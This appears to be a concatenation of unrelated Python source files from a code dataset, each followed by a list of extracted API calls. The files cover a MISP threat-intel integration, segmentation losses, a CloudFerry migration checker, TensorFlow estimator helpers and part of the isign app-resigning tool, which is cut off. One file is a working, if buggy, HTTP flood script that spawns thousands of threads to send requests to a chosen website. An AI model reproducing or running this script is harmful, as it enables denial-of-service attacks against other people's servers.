MISP update attribute\nAttribute: {attribute_uuid} was updated.\n" attribute = attribute_instance_response.get('Attribute') convert_timestamp_to_readable(attribute, None) parsed_attribute_data = replace_keys_from_misp_to_context_data(attribute) return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Attribute', outputs_key_field='ID', outputs=parsed_attribute_data, ) def main(): params = demisto.params() malicious_tag_ids = argToList(params.get('malicious_tag_ids')) suspicious_tag_ids = argToList(params.get('suspicious_tag_ids')) reliability = params.get('integrationReliability', 'B - Usually reliable') if DBotScoreReliability.is_valid_type(reliability): reliability = DBotScoreReliability.get_dbot_score_reliability_from_str(reliability) else: Exception("MISP V3 error: Please provide a valid value for the Source Reliability parameter") attributes_limit = arg_to_number(params.get('attributes_limit', 20), "attributes_limit", required=True) command = demisto.command() demisto.debug(f'[MISP V3]: command is {command}') args = demisto.args() try: malicious_tag_ids, suspicious_tag_ids = handle_tag_duplication_ids(malicious_tag_ids, suspicious_tag_ids) if command == 'test-module': return_results(test(malicious_tag_ids=malicious_tag_ids, suspicious_tag_ids=suspicious_tag_ids, attributes_limit=attributes_limit)) elif command == 'misp-create-event': return_results(create_event_command(args)) elif command == 'misp-add-attribute': return_results(add_attribute(demisto_args=args)) elif command == 'misp-search-events': return_results(search_events(args)) elif command == 'misp-search-attributes': return_results(search_attributes(args)) elif command == 'misp-delete-event': return_results(delete_event(args)) elif command == 'misp-add-sighting': return_results(add_sighting(args)) elif command == 'misp-add-tag-to-event': return_results(add_tag(args)) elif command == 'misp-add-tag-to-attribute': return_results(add_tag(demisto_args=args, is_attribute=True)) elif command == 'misp-remove-tag-from-event': return_results(remove_tag(args)) elif command == 'misp-remove-tag-from-attribute': return_results(remove_tag(demisto_args=args, is_attribute=True)) elif command == 'misp-add-events-from-feed': return_results(add_events_from_feed(demisto_args=args, use_ssl=VERIFY, proxies=PROXIES)) elif command == 'file': return_results( generic_reputation_command(args, 'file', 'FILE', malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit)) elif command == 'url': return_results( generic_reputation_command(args, 'url', 'URL', malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit)) elif command == 'ip': return_results( generic_reputation_command(args, 'ip', 'IP', malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit)) elif command == 'domain': return_results( generic_reputation_command(args, 'domain', 'DOMAIN', malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit)) elif command == 'email': return_results(generic_reputation_command(args, 'email', 'EMAIL', malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit)) elif command == 'misp-add-file-object': return_results(add_file_object(args)) elif command == 'misp-add-domain-object': return_results(add_domain_object(args)) elif command == 'misp-add-url-object': return_results(add_url_object(args)) elif command == 'misp-add-ip-object': return_results(add_ip_object(args)) elif command == 'misp-add-object': return_results(add_generic_object_command(args)) elif command == 'misp-update-attribute': return_results(update_attribute_command(args)) except PyMISPError as e: return_error(e.message) except Exception as e: return_error(str(e)) if __name__ in ['__main__', '__builtin__', 'builtins']: main()
[ "pymisp.tools.FileObject", "pymisp.tools.GenericObjectGenerator", "urllib.parse.urlparse", "urllib3.disable_warnings", "pymisp.MISPEvent", "pymisp.ExpandedPyMISP", "copy.deepcopy", "pymisp.MISPObject", "pymisp.MISPAttribute", "pymisp.MISPSighting" ]
[((1129, 1155), 'urllib3.disable_warnings', 'urllib3.disable_warnings', ([], {}), '()\n', (1153, 1155), False, 'import urllib3\n'), ((1584, 1659), 'pymisp.ExpandedPyMISP', 'ExpandedPyMISP', ([], {'url': 'MISP_URL', 'key': 'MISP_API_KEY', 'ssl': 'VERIFY', 'proxies': 'PROXIES'}), '(url=MISP_URL, key=MISP_API_KEY, ssl=VERIFY, proxies=PROXIES)\n', (1598, 1659), False, 'from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\n'), ((7707, 7744), 'pymisp.tools.GenericObjectGenerator', 'GenericObjectGenerator', (['template_name'], {}), '(template_name)\n', (7729, 7744), False, 'from pymisp.tools import GenericObjectGenerator\n'), ((12553, 12581), 'copy.deepcopy', 'copy.deepcopy', (['misp_response'], {}), '(misp_response)\n', (12566, 12581), False, 'import copy\n'), ((17464, 17475), 'pymisp.MISPEvent', 'MISPEvent', ([], {}), '()\n', (17473, 17475), False, 'from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\n'), ((33799, 33822), 'copy.deepcopy', 'copy.deepcopy', (['response'], {}), '(response)\n', (33812, 33822), False, 'import copy\n'), ((40516, 40539), 'copy.deepcopy', 'copy.deepcopy', (['response'], {}), '(response)\n', (40529, 40539), False, 'import copy\n'), ((47985, 47999), 'pymisp.MISPSighting', 'MISPSighting', ([], {}), '()\n', (47997, 47999), False, 'from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\n'), ((52082, 52103), 'pymisp.tools.FileObject', 'FileObject', (['file_path'], {}), '(file_path)\n', (52092, 52103), False, 'from pymisp.tools import FileObject\n'), ((52438, 52461), 'pymisp.MISPObject', 'MISPObject', (['"""domain-ip"""'], {}), "('domain-ip')\n", (52448, 52461), False, 'from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\n'), ((53044, 53057), 'urllib.parse.urlparse', 'urlparse', (['url'], {}), '(url)\n', (53052, 53057), False, 'from urllib.parse import urlparse\n'), ((57209, 57224), 'pymisp.MISPAttribute', 'MISPAttribute', ([], {}), '()\n', (57222, 57224), False, 'from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\n'), ((50039, 50050), 'pymisp.MISPEvent', 'MISPEvent', ([], {}), '()\n', (50048, 50050), False, 'from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\n')]
import torch from torch.nn import functional as F from torch import nn from torch.autograd import Variable from adet.utils.comm import compute_locations, aligned_bilinear def dice_coefficient(x, target): eps = 1e-5 n_inst = x.size(0) x = x.reshape(n_inst, -1) target = target.reshape(n_inst, -1) intersection = (x * target).sum(dim=1) union = (x ** 2.0).sum(dim=1) + (target ** 2.0).sum(dim=1) + eps loss = 1. - (2 * intersection / union) return loss def lovasz_grad(gt_sorted): """ Computes gradient of the Lovasz extension w.r.t sorted errors See Alg. 1 in paper """ p = len(gt_sorted) gts = gt_sorted.sum() intersection = gts - gt_sorted.float().cumsum(0) union = gts + (1 - gt_sorted.float()).cumsum(0) jaccard = 1. - intersection / union if p > 1: # cover 1-pixel case jaccard[1:p] = jaccard[1:p] - jaccard[0:-1] return jaccard def lovasz_hinge(logits, labels): """ Binary Lovasz hinge loss logits: [P] Variable, logits at each prediction (between -\infty and +\infty) labels: [P] Tensor, binary ground truth labels (0 or 1) """ if len(labels) == 0: # only void pixels, the gradients should be 0 return logits.sum() * 0. signs = 2. * labels.float() - 1. errors = (1. - logits * Variable(signs)) errors_sorted, perm = torch.sort(errors, dim=0, descending=True) perm = perm.data gt_sorted = labels[perm] grad = lovasz_grad(gt_sorted) loss = torch.dot(F.relu(errors_sorted), Variable(grad)) return loss def lovasz_loss(x, target): eps = 1e-6 n_inst = x.size(0) x = x.reshape(n_inst, -1) target = target.reshape(n_inst, -1) x = torch.clamp(x, min=eps, max=1-eps) x = torch.log(x) - torch.log(1 - x) losses = [] for i in range(n_inst): losses.append(lovasz_hinge(x[i], target[i])) loss = torch.stack(losses) return loss def build_mask_pred(cfg): return MaskPred(cfg) class MaskPred(nn.Module): def __init__(self, cfg): super(MaskPred, self).__init__() self.in_channels = cfg.MODEL.EMBEDMASK.MASK_BRANCH.OUT_CHANNELS self.mask_out_stride = cfg.MODEL.EMBEDMASK.MASK_OUT_STRIDE soi = cfg.MODEL.FCOS.SIZES_OF_INTEREST self.register_buffer("sizes_of_interest", torch.tensor(soi + [soi[-1] * 2])) self.register_buffer("_iter", torch.zeros([1])) self.mask_loss_type = cfg.MODEL.EMBEDMASK.MASK_LOSS_TYPE self.mask_loss_alpha = cfg.MODEL.EMBEDMASK.MASK_LOSS_ALPHA def __call__(self, pixel_embed, mask_feat_stride, pred_instances, gt_instances=None): if self.training: self._iter += 1 gt_inds = pred_instances.gt_inds gt_bitmasks = torch.cat([per_im.gt_bitmasks for per_im in gt_instances]) gt_bitmasks = gt_bitmasks[gt_inds].unsqueeze(dim=1).to(dtype=pixel_embed.dtype) losses = {} if len(pred_instances) == 0: dummy_loss = pixel_embed.sum() * 0 + pred_instances.proposal_embed.sum() * 0 + pred_instances.proposal_margin.sum() * 0 losses["loss_mask"] = dummy_loss else: mask_prob = self.compute_mask_prob(pred_instances, pixel_embed, mask_feat_stride) if self.mask_loss_type == "Dice": mask_losses = dice_coefficient(mask_prob, gt_bitmasks) loss_mask = mask_losses.mean() elif self.mask_loss_type == "Lovasz": mask_losses = lovasz_loss(mask_prob, gt_bitmasks) loss_mask = mask_losses.mean() losses["loss_mask"] = loss_mask * self.mask_loss_alpha return losses else: if len(pred_instances) > 0: mask_prob = self.compute_mask_prob(pred_instances, pixel_embed, mask_feat_stride) pred_instances.pred_global_masks = mask_prob return pred_instances def compute_mask_prob(self, instances, pixel_embed, mask_feat_stride): proposal_embed = instances.proposal_embed proposal_margin = instances.proposal_margin im_inds = instances.im_inds dim, m_h, m_w = pixel_embed.shape[-3:] obj_num = proposal_embed.shape[0] pixel_embed = pixel_embed.permute(0, 2, 3, 1)[im_inds] proposal_embed = proposal_embed.view(obj_num, 1, 1, -1).expand(-1, m_h, m_w, -1) proposal_margin = proposal_margin.view(obj_num, 1, 1, dim).expand(-1, m_h, m_w, -1) mask_var = (pixel_embed - proposal_embed) ** 2 mask_prob = torch.exp(-torch.sum(mask_var * proposal_margin, dim=3)) assert mask_feat_stride >= self.mask_out_stride assert mask_feat_stride % self.mask_out_stride == 0 mask_prob = aligned_bilinear(mask_prob.unsqueeze(1), int(mask_feat_stride / self.mask_out_stride)) return mask_prob
[ "torch.sort", "torch.log", "torch.stack", "torch.tensor", "torch.cat", "torch.sum", "torch.nn.functional.relu", "torch.autograd.Variable", "torch.zeros", "torch.clamp" ]
[((1370, 1412), 'torch.sort', 'torch.sort', (['errors'], {'dim': '(0)', 'descending': '(True)'}), '(errors, dim=0, descending=True)\n', (1380, 1412), False, 'import torch\n'), ((1719, 1755), 'torch.clamp', 'torch.clamp', (['x'], {'min': 'eps', 'max': '(1 - eps)'}), '(x, min=eps, max=1 - eps)\n', (1730, 1755), False, 'import torch\n'), ((1903, 1922), 'torch.stack', 'torch.stack', (['losses'], {}), '(losses)\n', (1914, 1922), False, 'import torch\n'), ((1518, 1539), 'torch.nn.functional.relu', 'F.relu', (['errors_sorted'], {}), '(errors_sorted)\n', (1524, 1539), True, 'from torch.nn import functional as F\n'), ((1541, 1555), 'torch.autograd.Variable', 'Variable', (['grad'], {}), '(grad)\n', (1549, 1555), False, 'from torch.autograd import Variable\n'), ((1762, 1774), 'torch.log', 'torch.log', (['x'], {}), '(x)\n', (1771, 1774), False, 'import torch\n'), ((1777, 1793), 'torch.log', 'torch.log', (['(1 - x)'], {}), '(1 - x)\n', (1786, 1793), False, 'import torch\n'), ((1327, 1342), 'torch.autograd.Variable', 'Variable', (['signs'], {}), '(signs)\n', (1335, 1342), False, 'from torch.autograd import Variable\n'), ((2328, 2361), 'torch.tensor', 'torch.tensor', (['(soi + [soi[-1] * 2])'], {}), '(soi + [soi[-1] * 2])\n', (2340, 2361), False, 'import torch\n'), ((2402, 2418), 'torch.zeros', 'torch.zeros', (['[1]'], {}), '([1])\n', (2413, 2418), False, 'import torch\n'), ((2770, 2828), 'torch.cat', 'torch.cat', (['[per_im.gt_bitmasks for per_im in gt_instances]'], {}), '([per_im.gt_bitmasks for per_im in gt_instances])\n', (2779, 2828), False, 'import torch\n'), ((4622, 4666), 'torch.sum', 'torch.sum', (['(mask_var * proposal_margin)'], {'dim': '(3)'}), '(mask_var * proposal_margin, dim=3)\n', (4631, 4666), False, 'import torch\n')]
# Copyright 2016 Mirantis Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import getpass import logging from cloudferry.lib.base import exception from cloudferry.lib.base.action import action from cloudferry.lib.utils import local from cloudferry.lib.utils import remote_runner LOG = logging.getLogger(__name__) class CheckVMAXPrerequisites(action.Action): """This verifies prerequisites required for NFS to VMAX iSCSI cinder volume migration""" def _iscsiadm_is_installed_locally(self): LOG.info("Checking if iscsiadm tool is installed") try: local.run('iscsiadm --help &>/dev/null') except local.LocalExecutionFailed: msg = ("iscsiadm is not available on the local host. Please " "install iscsiadm tool on the node you running on or " "choose other cinder backend for migration. iscsiadm is " "mandatory for migrations with EMC VMAX cinder backend") LOG.error(msg) raise exception.AbortMigrationError(msg) def _check_local_sudo_password_set(self): current_user = getpass.getuser() if current_user != 'root' and \ self.cfg.migrate.local_sudo_password is None: try: local.sudo('ls') except local.LocalExecutionFailed: msg = ("CloudFerry is running as '{user}' user, but " "passwordless sudo does not seem to be configured on " "current host. Please either specify password in " "`local_sudo_password` config option, or run " "CloudFerry as root user.").format(user=current_user) LOG.error(msg) raise exception.AbortMigrationError(msg) def _ssh_connectivity_between_controllers(self): src_host = self.cfg.src.ssh_host src_user = self.cfg.src.ssh_user dst_host = self.cfg.dst.ssh_host dst_user = self.cfg.dst.ssh_user LOG.info("Checking ssh connectivity between '%s' and '%s'", src_host, dst_host) rr = remote_runner.RemoteRunner(src_host, src_user) ssh_opts = ('-o UserKnownHostsFile=/dev/null ' '-o StrictHostKeyChecking=no') cmd = "ssh {opts} {user}@{host} 'echo ok'".format(opts=ssh_opts, user=dst_user, host=dst_host) try: rr.run(cmd) except remote_runner.RemoteExecutionError: msg = ("No ssh connectivity between source host '{src_host}' and " "destination host '{dst_host}'. Make sure you have keys " "and correct configuration on these nodes. To verify run " "'{ssh_cmd}' from '{src_host}' node") msg = msg.format(src_host=src_host, dst_host=dst_host, ssh_cmd=cmd) LOG.error(msg) raise exception.AbortMigrationError(msg) def run(self, **kwargs): if self.cfg.dst_storage.backend != 'iscsi-vmax': return self._iscsiadm_is_installed_locally() self._ssh_connectivity_between_controllers() self._check_local_sudo_password_set()
[ "logging.getLogger", "cloudferry.lib.utils.remote_runner.RemoteRunner", "cloudferry.lib.utils.local.sudo", "cloudferry.lib.base.exception.AbortMigrationError", "cloudferry.lib.utils.local.run", "getpass.getuser" ]
[((789, 816), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (806, 816), False, 'import logging\n'), ((1627, 1644), 'getpass.getuser', 'getpass.getuser', ([], {}), '()\n', (1642, 1644), False, 'import getpass\n'), ((2639, 2685), 'cloudferry.lib.utils.remote_runner.RemoteRunner', 'remote_runner.RemoteRunner', (['src_host', 'src_user'], {}), '(src_host, src_user)\n', (2665, 2685), False, 'from cloudferry.lib.utils import remote_runner\n'), ((1092, 1132), 'cloudferry.lib.utils.local.run', 'local.run', (['"""iscsiadm --help &>/dev/null"""'], {}), "('iscsiadm --help &>/dev/null')\n", (1101, 1132), False, 'from cloudferry.lib.utils import local\n'), ((1522, 1556), 'cloudferry.lib.base.exception.AbortMigrationError', 'exception.AbortMigrationError', (['msg'], {}), '(msg)\n', (1551, 1556), False, 'from cloudferry.lib.base import exception\n'), ((1780, 1796), 'cloudferry.lib.utils.local.sudo', 'local.sudo', (['"""ls"""'], {}), "('ls')\n", (1790, 1796), False, 'from cloudferry.lib.utils import local\n'), ((3518, 3552), 'cloudferry.lib.base.exception.AbortMigrationError', 'exception.AbortMigrationError', (['msg'], {}), '(msg)\n', (3547, 3552), False, 'from cloudferry.lib.base import exception\n'), ((2266, 2300), 'cloudferry.lib.base.exception.AbortMigrationError', 'exception.AbortMigrationError', (['msg'], {}), '(msg)\n', (2295, 2300), False, 'from cloudferry.lib.base import exception\n')]
import random import socket import string import sys import threading import time def attack(host: str, port: int = 80, request_count: int = 10 ** 10) -> None: # Threading support thread_num = 0 thread_num_mutex = threading.Lock() # Utility function def print_status() -> None: global thread_num thread_num_mutex.acquire(True) thread_num += 1 print(f"\n[{time.ctime().split(' ')[3]}] [{str(thread_num)}] Under progress...") thread_num_mutex.release() def generate_url_path(): msg = str(string.ascii_letters + string.digits + string.punctuation) data = "".join(random.sample(msg, 5)) return data def attack_() -> None: print_status() url_path = generate_url_path() dos = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: dos.connect((ip, port)) msg = f"GET /{url_path} HTTP/1.1\nHost: {host}\n\n" dos.send(msg.encode()) except socket.error: print(f"[ERROR] Site may be down | {socket.error}") finally: dos.shutdown(socket.SHUT_RDWR) dos.close() try: host = host.replace("https://", "").replace("http://", "").replace("www.", "") ip = socket.gethostbyname(host) except socket.gaierror: print("[ERROR] Make sure you entered a correct website!") sys.exit(2) all_threads = [] for i in range(request_count): t1 = threading.Thread(target=attack) t1.start() all_threads.append(t1) time.sleep(0.01) for current_thread in all_threads: current_thread.join()
[ "socket.gethostbyname", "random.sample", "time.ctime", "socket.socket", "threading.Lock", "time.sleep", "sys.exit", "threading.Thread" ]
[((228, 244), 'threading.Lock', 'threading.Lock', ([], {}), '()\n', (242, 244), False, 'import threading\n'), ((794, 843), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (807, 843), False, 'import socket\n'), ((1281, 1307), 'socket.gethostbyname', 'socket.gethostbyname', (['host'], {}), '(host)\n', (1301, 1307), False, 'import socket\n'), ((1493, 1524), 'threading.Thread', 'threading.Thread', ([], {'target': 'attack'}), '(target=attack)\n', (1509, 1524), False, 'import threading\n'), ((1584, 1600), 'time.sleep', 'time.sleep', (['(0.01)'], {}), '(0.01)\n', (1594, 1600), False, 'import time\n'), ((646, 667), 'random.sample', 'random.sample', (['msg', '(5)'], {}), '(msg, 5)\n', (659, 667), False, 'import random\n'), ((1410, 1421), 'sys.exit', 'sys.exit', (['(2)'], {}), '(2)\n', (1418, 1421), False, 'import sys\n'), ((411, 423), 'time.ctime', 'time.ctime', ([], {}), '()\n', (421, 423), False, 'import time\n')]
import random class Yolov3(object): def __init__(self): self.num=0 self.input_size=[8,16,32] def __iter__(self): return self def __next__(self): a = random.choice(self.input_size) self.num=self.num+1 if self.num<3: return a else: raise StopIteration yolo=Yolov3() for data in yolo: print(data)
[ "random.choice" ]
[((161, 191), 'random.choice', 'random.choice', (['self.input_size'], {}), '(self.input_size)\n', (174, 191), False, 'import random\n')]
import googlemaps gmaps = googlemaps.Client(key='google_key') def get_markers(address): geocode_result = gmaps.geocode(address) return geocode_result[0]['geometry']['location']
[ "googlemaps.Client" ]
[((27, 62), 'googlemaps.Client', 'googlemaps.Client', ([], {'key': '"""google_key"""'}), "(key='google_key')\n", (44, 62), False, 'import googlemaps\n')]
from __future__ import absolute_import from __future__ import division from __future__ import print_function # Imports import os import numpy as np import tensorflow as tf def run(model, X, Y, optimizer=None, nb_epochs=30, nb_batches=128): """ Run the estimator """ if optimizer is None: optimizer = tf.keras.estimators.SGD( lr=0.0009, decay=1e-5, momentum=0.9, nesterov=True) # 1. Compile the model model.compile( optimizer=optimizer, loss='categorical_crossentropy', metrics=['accuracy']) # 2. Create an estimator model_est = tf.keras.estimator.model_to_estimator( keras_model=model, model_dir='./lenet') # Training # 3a. Create the training function train_input_fn = tf.estimator.inputs.numpy_input_fn( x={model.input_names[0]: X['train'].astype(np.float32)}, y=Y['train'].astype(np.float32), batch_size=nb_batches, num_epochs=nb_epochs, shuffle=True ) # 3b. Train the model model_est.train(input_fn=train_input_fn, steps=nb_epochs*nb_batches) # Evaluate # 4a. Evaluate the model eval_input_fn = tf.estimator.inputs.numpy_input_fn( x={model.input_names[0]: X['test'].astype(np.float32)}, y=Y['test'].astype(np.float32), batch_size=nb_batches, num_epochs=nb_epochs, shuffle=True ) # 4b. Evaluate the model model_eval = model_est.evaluate(input_fn=eval_input_fn) print(model_eval) return model_est, model_eval def run_from_generator( model, input_func=None, input_func_dict=None, eval_func_dict=None, nb_epochs=10, optimizer=None, model_dir=None): """ Overloaded function to create an estimator using tf.data.Dataset :param model : uncompiled keras model :param input_fn : input function providing tf.data.Dataset to the estimator :param input_fn_dict : dictionary containing input params for input_fn :param eval_fn_dict : dictionary containing params for eval input_fn :param model_dir : directory to store the trained model """ # 1. Create optimizer and compile model if optimizer is None if (optimizer is None): optimizer = tf.keras.optimizers.SGD( lr=1e-3, decay=1e-5, momentum=0.9, nesterov=True) # 2. compile the model model.compile( optimizer=optimizer, loss='categorical_crossentropy', metrics=['accuracy']) # 3. create estimator dir_path = os.path.join(os.getcwd(), model_dir) print("Model path chosen : ", dir_path) if (not os.path.exists(dir_path)): os.mkdir(dir_path) print("Creating estimator...") est = tf.keras.estimator.model_to_estimator( keras_model=model, model_dir=dir_path) # 4. Train and Evaluate the model print("Training...") # training spec train_spec = tf.estimator.TrainSpec(input_fn=lambda: input_func(input_func_dict), max_steps=500) # evaluation spec eval_spec = tf.estimator.EvalSpec(input_fn=lambda: input_func(eval_func_dict)) # Run the training model_est = tf.estimator.train_and_evaluate(est, train_spec, eval_spec) #est.train(input_fn=lambda: input_func(input_func_dict), # steps=None) # #est.evalute(input_fn=lambda: input_func(eval_func_dict)) return est
[ "os.path.exists", "tensorflow.keras.estimator.model_to_estimator", "tensorflow.estimator.train_and_evaluate", "tensorflow.keras.optimizers.SGD", "os.getcwd", "os.mkdir", "tensorflow.keras.estimators.SGD" ]
[((613, 690), 'tensorflow.keras.estimator.model_to_estimator', 'tf.keras.estimator.model_to_estimator', ([], {'keras_model': 'model', 'model_dir': '"""./lenet"""'}), "(keras_model=model, model_dir='./lenet')\n", (650, 690), True, 'import tensorflow as tf\n'), ((2763, 2839), 'tensorflow.keras.estimator.model_to_estimator', 'tf.keras.estimator.model_to_estimator', ([], {'keras_model': 'model', 'model_dir': 'dir_path'}), '(keras_model=model, model_dir=dir_path)\n', (2800, 2839), True, 'import tensorflow as tf\n'), ((3197, 3256), 'tensorflow.estimator.train_and_evaluate', 'tf.estimator.train_and_evaluate', (['est', 'train_spec', 'eval_spec'], {}), '(est, train_spec, eval_spec)\n', (3228, 3256), True, 'import tensorflow as tf\n'), ((327, 403), 'tensorflow.keras.estimators.SGD', 'tf.keras.estimators.SGD', ([], {'lr': '(0.0009)', 'decay': '(1e-05)', 'momentum': '(0.9)', 'nesterov': '(True)'}), '(lr=0.0009, decay=1e-05, momentum=0.9, nesterov=True)\n', (350, 403), True, 'import tensorflow as tf\n'), ((2290, 2365), 'tensorflow.keras.optimizers.SGD', 'tf.keras.optimizers.SGD', ([], {'lr': '(0.001)', 'decay': '(1e-05)', 'momentum': '(0.9)', 'nesterov': '(True)'}), '(lr=0.001, decay=1e-05, momentum=0.9, nesterov=True)\n', (2313, 2365), True, 'import tensorflow as tf\n'), ((2583, 2594), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (2592, 2594), False, 'import os\n'), ((2663, 2687), 'os.path.exists', 'os.path.exists', (['dir_path'], {}), '(dir_path)\n', (2677, 2687), False, 'import os\n'), ((2698, 2716), 'os.mkdir', 'os.mkdir', (['dir_path'], {}), '(dir_path)\n', (2706, 2716), False, 'import os\n')]
""" Represents an app archive. This is an app at rest, whether it's a naked app bundle in a directory, or a zipped app bundle, or an IPA. We have a common interface to extract these apps to a temp file, then resign them, and create an archive of the same type """ import abc import biplist from bundle import App, Bundle, is_info_plist_native from exceptions import MissingHelpers, NotSignable, NotMatched from distutils import spawn import logging import os from os.path import abspath, dirname, exists, isdir, isfile, join, normpath import tempfile import re from subprocess import call from signer import Signer import shutil import zipfile REMOVE_WATCHKIT = True helper_paths = {} log = logging.getLogger(__name__) def get_helper(helper_name): """ find paths to executables. Cached in helper_paths """ if helper_name not in helper_paths or helper_paths[helper_name] is None: # note, find_executable returns None is not found # in other words, we keep retrying until found helper_paths[helper_name] = spawn.find_executable(helper_name) log.debug("got executable {} for {}".format(helper_paths[helper_name], helper_name)) return helper_paths[helper_name] def make_temp_dir(): return tempfile.mkdtemp(prefix="isign-") def get_watchkit_paths(root_bundle_path): """ collect sub-bundles of this bundle that have watchkit """ # typical structure: # # app_bundle # ... # some_directory # watchkit_extension <-- this is the watchkit bundle # Info.plist # watchkit_bundle <-- this is the part that runs on the Watch # Info.plist <-- WKWatchKitApp=True # watchkit_paths = [] for path, _, _ in os.walk(root_bundle_path): if path == root_bundle_path: continue try: bundle = Bundle(path) except NotMatched: # this directory is not a bundle continue if bundle.info.get('WKWatchKitApp') is True: # get the *containing* bundle watchkit_paths.append(dirname(path)) return watchkit_paths def process_watchkit(root_bundle_path, should_remove=False): """ Unfortunately, we currently can't sign WatchKit. If you don't care about watchkit functionality, it is generally harmless to remove it, so that's the default. Remove when https://github.com/saucelabs/isign/issues/20 is fixed """ watchkit_paths = get_watchkit_paths(root_bundle_path) if len(watchkit_paths) > 0: if should_remove: for path in watchkit_paths: log.warning("Removing WatchKit bundle {}".format(path)) shutil.rmtree(path) else: raise NotSignable("Cannot yet sign WatchKit bundles") class Archive(object): __metaclass__ = abc.ABCMeta # we use abc.abstractmethod throughout because there are certain class # methods we want to ensure are implemented. @abc.abstractmethod def unarchive_to_temp(self): """ Unarchive and copy to a temp directory """ pass @abc.abstractmethod def archive(cls, path, output_path): """ Archive a directory to an output path """ pass @abc.abstractmethod def get_info(cls, path): """ Obtain app metadata from Info.plist without unarchiving """ pass @abc.abstractmethod def precheck(cls, path): """ Check if this is, in fact, an archive of this type """ pass @abc.abstractmethod def find_bundle_dir(cls, path): """ Locate the directory of the main app (aka bundle) """ pass class AppArchive(Archive): """ The simplest form of archive -- a naked App Bundle, with no extra directory structure, compression, etc """ @classmethod def find_bundle_dir(cls, path): """ Included for similarity with the zipped archive classes. In this case, the bundle dir *is* the directory """ return path @classmethod def _get_plist_path(cls, path): return join(cls.find_bundle_dir(path), "Info.plist") @classmethod def get_info(cls, path): return biplist.readPlist(cls._get_plist_path(path)) @classmethod def precheck(cls, path): if not isdir(path): return False if not os.path.exists(cls._get_plist_path(path)): return False plist = cls.get_info(path) is_native = is_info_plist_native(plist) log.debug("is_native: {}".format(is_native)) return is_native @classmethod def archive(cls, path, output_path): if exists(output_path): shutil.rmtree(output_path) shutil.move(path, output_path) log.info("archived %s to %s" % (cls.__name__, output_path)) def __init__(self, path): self.path = path self.relative_bundle_dir = '.' self.bundle_info = self.get_info(self.path) def unarchive_to_temp(self): containing_dir = make_temp_dir() log.debug("unarchiving to temp... %s -> %s", self.path, containing_dir) shutil.rmtree(containing_dir) # quirk of copytree, top dir can't exist already shutil.copytree(self.path, containing_dir) process_watchkit(containing_dir, REMOVE_WATCHKIT) return UncompressedArchive(containing_dir, '.', self.__class__) class AppZipArchive(Archive): """ Just like an app, except it's zipped up, and when repackaged, should be re-zipped. """ app_dir_pattern = r'^([^/]+\.app/).*$' extensions = ['.zip'] helpers = ['zip', 'unzip'] @classmethod def is_helpers_present(cls): """ returns False if any of our helper apps wasn't found in class init """ is_present = True for helper_name in cls.helpers: if get_helper(helper_name) is None: log.error("missing helper for class {}: {}".format(cls.__name__, helper_name)) is_present = False break return is_present @classmethod def is_archive_extension_match(cls, path): """ does this path have the right extension """ log.debug('extension match') for extension in cls.extensions: log.debug('extension match: %s', extension) if path.endswith(extension): return True return False @classmethod def find_bundle_dir(cls, zipfile_obj): relative_bundle_dir = None apps = set() file_list = zipfile_obj.namelist() for file_name in file_list: matched = re.match(cls.app_dir_pattern, file_name) if matched: apps.add(matched.group(1)) if len(apps) == 1: log.debug("found one app") relative_bundle_dir = apps.pop() elif len(apps) > 1: log.warning('more than one app found in archive') else: log.warning('no apps found in archive') return relative_bundle_dir @classmethod def _get_plist_path(cls, relative_bundle_dir): return join(relative_bundle_dir, "Info.plist") @classmethod def precheck(cls, path): """ Checks if an archive looks like this kind of app. Have to examine within the zipfile, b/c we don't want to make temp dirs just yet. This recapitulates a very similar precheck in the Bundle class """ if not isfile(path): return False if not cls.is_helpers_present(): raise MissingHelpers("helpers not present") is_native = False log.debug('precheck') log.debug('path: %s', path) if (cls.is_archive_extension_match(path) and zipfile.is_zipfile(path)): log.debug("this is an archive, and a zipfile") zipfile_obj = zipfile.ZipFile(path) relative_bundle_dir = cls.find_bundle_dir(zipfile_obj) if relative_bundle_dir is not None: plist_path = cls._get_plist_path(relative_bundle_dir) if plist_path not in zipfile_obj.namelist(): return False plist = cls.get_info(relative_bundle_dir, zipfile_obj) is_native = is_info_plist_native(plist) log.debug("is_native: {}".format(is_native)) return is_native @classmethod def get_info(cls, relative_bundle_dir, zipfile_obj): plist_path = cls._get_plist_path(relative_bundle_dir) plist_bytes = zipfile_obj.read(plist_path) return biplist.readPlistFromString(plist_bytes) def __init__(self, path): self.path = path zipfile_obj = zipfile.ZipFile(path) self.relative_bundle_dir = self.find_bundle_dir(zipfile_obj) self.bundle_info = self.get_info(self.relative_bundle_dir, zipfile_obj) def unarchive_to_temp(self): containing_dir = make_temp_dir() call([get_helper('unzip'), "-qu", self.path, "-d", containing_dir]) app_dir = abspath(join(containing_dir, self.relative_bundle_dir)) process_watchkit(app_dir, REMOVE_WATCHKIT) return UncompressedArchive(containing_dir, self.relative_bundle_dir, self.__class__) @classmethod def archive(cls, containing_dir, output_path): """ archive this up into a zipfile. Note this is a classmethod, because the caller will use us on a temp directory somewhere """ # the temp file is necessary because zip always adds ".zip" if it # does not have an extension. 